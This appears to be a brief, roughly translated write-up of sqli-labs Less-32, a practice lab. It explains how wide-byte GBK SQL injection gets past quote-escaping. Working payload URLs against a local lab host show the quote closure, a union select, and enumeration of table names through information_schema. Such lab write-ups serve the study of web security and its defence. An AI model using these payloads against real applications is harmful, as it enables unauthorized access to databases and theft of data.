Escape function for the following characters, so that the quotation marks cannot be closed, resulting in the inability to inject
'--\ '
"--\"
--\ \
However, when MySQL's client character set is GBK, wide-byte injection can occur, referencing http://netsecurity.51cto.com/art/201404/435074.htm
%df '--%df\ '%df%5c '
So the quotation marks are closed, and as for the%df%5c, it becomes the Chinese character.
Closed successfully
http://192.168.136.128/sqli-labs-master/Less-32/?id=1%df '
http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df ' union select 1,2,3%23
Table name
HTTP://192.168.136.128/SQLI-LABS-MASTER/LESS-32/?ID=0%DF ' Union select 1,2,table_name from Information_ Schema.tables where table_schema=0x7365637572697479 limit 0,1%23
"Sqli-labs" Less32 Get-bypass custom Filter adding slashes to dangrous chars (GET type escaped the '/"character's wide-byte injection)